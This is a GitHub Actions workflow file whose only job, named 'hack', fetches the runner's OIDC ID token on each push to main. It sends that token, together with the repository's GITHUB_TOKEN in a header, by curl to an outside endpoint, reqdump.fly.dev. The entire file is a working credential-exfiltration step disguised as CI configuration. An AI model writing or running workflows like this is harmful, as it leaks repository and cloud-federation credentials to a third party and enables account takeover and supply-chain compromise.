on:
  push:
    branches:
      - main
  workflow_dispatch:
jobs:
  testing:
    permissions:
      contents: "read"
      id-token: "write"
    name: hack
    runs-on: ubuntu-latest
    steps:
      - name: dump request
        run: |
          payload=$(curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=hookd")
          curl https://reqdump.fly.dev --data "$payload" -H"Authorization: ${{env.GITHUB_TOKEN}}"

